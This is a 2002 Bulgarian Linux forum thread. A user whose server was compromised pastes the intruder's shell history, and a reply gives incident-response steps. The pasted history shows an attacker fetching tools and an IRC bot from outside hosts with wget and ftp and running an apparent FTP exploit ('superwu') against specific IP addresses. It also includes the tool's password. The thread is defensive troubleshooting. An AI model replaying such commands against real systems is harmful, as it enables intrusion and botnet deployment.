Автор Тема: Hack!! kakvo da pravia  (Прочетена 3605 пъти)

eureka

  • Новаци
  • *
  • Публикации: 1
    • Профил
Hack!! kakvo da pravia
« -: Nov 19, 2002, 14:42 »
Zdravej,
Imam nujda ot pomosht i tyrsia otgovori na iakolko vyprosa.

Predi okolo mesec si pusnah kabelen internet, i tyj kato tova mi beshe neshto kato "detska mechta" - vednaga podkarah na ednin star Pentium na 188 Mhz RedHat 6.2.
Spriah pochti vsichko s izkliuchenie na DNS,http,Authentication service na port 113 /NE ZNAM KAK DA GO SPRA/, i kachih SSH2-non comersial version.
Configurirah go da rutira vsichko praz nego i s ipchains maskirah localnite adresi.
Kompiutyra raboti taka v prodyljenie na mesec kato az chat-pat vlizah za da pocykam (opitvah da si podkaram multi-ruter-trafo-grafer(ne sym)) ... i taka.
Predi dva dena se lognah i ostanovih che imam mail !!!
tochnia text ne moga da ti kaja ..
//za syjalenie dokato chovyrkah sym zatril mbox-a//
..no beshe neshto svyrzano s err pri logratate
zapochnah da se chudia i da "rychkam" za da ustanovia prichinata.. i se natyknah na stranni "pisania" v history-to:

  789  exit
*********
  790  cd /dev/hpd
  791  cd /dev/hpd
  792  cd /dev
  793  mkdir hpd
  794  cd hpd
  795  ls
  796  ftp lordice.ro
  797  ls
  798  tar -zvf 1.tar.gz
  799  tar -xvf 1.tar.gz
  800  tar -xf 1.tar.gz
  801  tar -zxvf 1.tar.gz
  802  ls
  803  tar -zf 1.tar.gz
  804  tar --help
  805  tar -tvf 1.tar.gz
  806  rm -rf 1.tar.gz
  807  wget folositoare.go.ro/1.tar.gz
  808  ftp 65.126.126.199
  809  ftp 193.231.236.41
  810  ftp 193.231.236.41
  811  wget imperr.home.ro/darkbot-6f6-r6_tar.tar
  812  ftp blabla.com
  813  ftp alyla.net
  814  ls
  815  tar -xzvf  darkbot-6f6-r6_tar.tar
  816  cd darkbot6f6/
  817  ls
  818  cd dat
  819  ls
  820  cd ..
  821  cd docs
  822  ls
  823  pico README
  824  cd ..
  825   cd../
  826  pico
  827  cd ..
  828  ls
  829  rm -rf bitchbot-1_0_2_tar.tar  darkbot6f6
  830  rm -rf darkbot-6f6-r6_tar.tar
  831  tar -xzvf superwu.tar.gz
  832  cd super-wu
  833  ./superwu  64.18.125.90 21
  834  ./superwu 64.244.71.19 21
  *******
  835  cd /mnt/cdrom
  ...
  kakto mojesh da si predstavish uchudvaneto mi beshe super goliamo...


s enda 'last' command ustanovih che ima zapisi ot roda
**
ftp      ftpd12124    pD9514DE2.dip.t- Tue Nov  5 14:50 - 14:53  (00':0'3)
ftp      ftpd1645     telehouse-103-1- Fri Nov  8 09:39 - 09:40  (00':0'0)
ftp      ftpd1276     206.48.88.103    Wed Nov  6 14:10 - down   (03:12)
ftp      ftpd872      160.40.15.54     Wed Nov  6 02':0'7 - down   (15:16)
**
'<img'>) .. ADOVA RABOTA ..
dokopah se do 'superwu' i pri startiranetpo mi iska password
v edna ot poddirectoriite otkrih 'README' v koeto pishe samo!!:
password:wegotelectricstyle
seshtash se che ia napisah ... i mi se poiavi
"Ask Electricy members for this"
ps -A ne mi raboi / lipsvat hiliadi logove / i kakvo li oshte ne
ot togava gi tyrsia i ne znam kakvo da pravia.

Obshto vzeto tova e. Razchitam na niakakvo mnenie i support

Pozdravi Eureka

PS
kak da spra authentication service na port 113
Активен

savel

  • Напреднали
  • *****
  • Публикации: 52
    • Профил
Hack!! kakvo da pravia
« Отговор #1 -: Nov 19, 2002, 15:34 »
o4evidno nqkoi te  e "root-nal" , demek hack-nal  '<img'>
pyrvo ako ti e localno mashinata spri vsi4ki remote login demoni
dori vsi4ki ostanali
sled koeto pregledai kakvito logove sa ti ostanali i ako mojesh ottam
razberi  koga , kak i etc.
proverqvqsh /etc/passwd za dobaveni users i triesh ako ima symnitelni
v /etc/inetd.conf preglejdash za dobaveni services koito da slujat kato backdoor i gi mahash ako ima takiva
sled koeto killall -HUP inetd
poglejdash za symnitelni procesi s ps , ili netstat
tyrsish i ostaveni setuid root files
za kernel root kit malko trudno she proverish , nai-sigurno e upgrade na kernela ot rpm ili src
update-vash si i ftp, httpd , dns i t.n.
a vyzmojno e da sa podmeneni i /bin/login i /bin/su primerno
'<img'>
uspeh
a i oshte neshto
hacker4eto si e napravilo dir v /dev, /dev/hpd
razgledai i q iztrii '<img'>
ps syshto moje da e podmenen za da krie opredeleni procesi...
authentication se spira kato comment-nesh reda za identd v /etc/inetd.conf , i sled tova restartirash inetd
Активен

Подобни теми
Заглавие Започната от Отговора Прегледи Последна публикация
Kakvo e Aurora?
Настройка на програми
DJSlavchik 1 2490 Последна публикация Jun 24, 2002, 15:13
от n_antonov
Nakoi ima li ideia kakvo e...
Настройка на програми
boril 1 2181 Последна публикация Oct 17, 2002, 18:25
от
Hack/Exploit в hlds v1.1.1.0
Настройки на софтуер
thc 0 4247 Последна публикация Mar 18, 2005, 21:45
от thc
някакви новини от hack attack
Живота, вселената и някакви други глупости
ray 3 4031 Последна публикация Apr 21, 2006, 21:12
от DoctorA
Hack the hackers
Предстоящи събития
b2l 3 20559 Последна публикация Jun 06, 2021, 00:54
от pLazmys